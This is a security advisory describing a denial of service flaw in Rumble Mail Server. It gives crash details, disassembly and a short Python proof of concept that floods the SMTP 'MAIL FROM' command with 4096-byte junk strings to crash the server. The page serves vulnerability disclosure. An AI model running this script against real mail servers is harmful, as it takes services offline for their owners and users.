Home
Consulting
Advisories
Software
Articles
Contact

Rumble 0.25.2232 Denial Of Service

Legacy Advisories

Description

A denial of service vulnerability can be exploited to crash Rumble Mail Server v0.25.2231. rumble_win32.exe: The instruction at 0x96CEEB referenced memory at 0x41414149. The memory could not be read (0x0096CEEB -> 41414149) Disassembly: .text:0096CEEB mov edx, [ecx+8] .text:0096CEEE mov [ebp-8], edx .text:0096CEF1 mov eax, [ebp-8] .text:0096CEF4 mov ecx, [eax] .text:0096CEF6 mov [ebp-0Ch], ecx .text:0096CEF9 mov edx, [ebp+0Ch] .text:0096CEFC mov [ebp-10h], edx .text:0096CEFF .text:0096CEFF loc_96CEFF: ; CODE XREF: .text:0096CF31 .text:0096CEFF mov eax, [ebp-10h] .text:0096CF02 mov cl, [eax] .text:0096CF04 mov [ebp-11h], cl .text:0096CF07 mov edx, [ebp-0Ch] .text:0096CF0A cmp cl, [edx] .text:0096CF0C jnz short loc_96CF3C

Proof Of Concept

import socket

host = 'localhost'
tld = 'mydomain.tld'
port = 25

def crash():    
 for i in range(0, 16):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((host, port))
  s.settimeout(32)    
  
  junk = 'A' * 4096
  
  print s.recv(8192)
  s.send('HELO ' + tld + '\r\n')
  print s.recv(8192)
  s.send('MAIL FROM ' + junk + '\r\n') 
  print s.recv(8192)
  
  s.close()
 

crash()


Copyright © 2018 AutoSec Tools LLC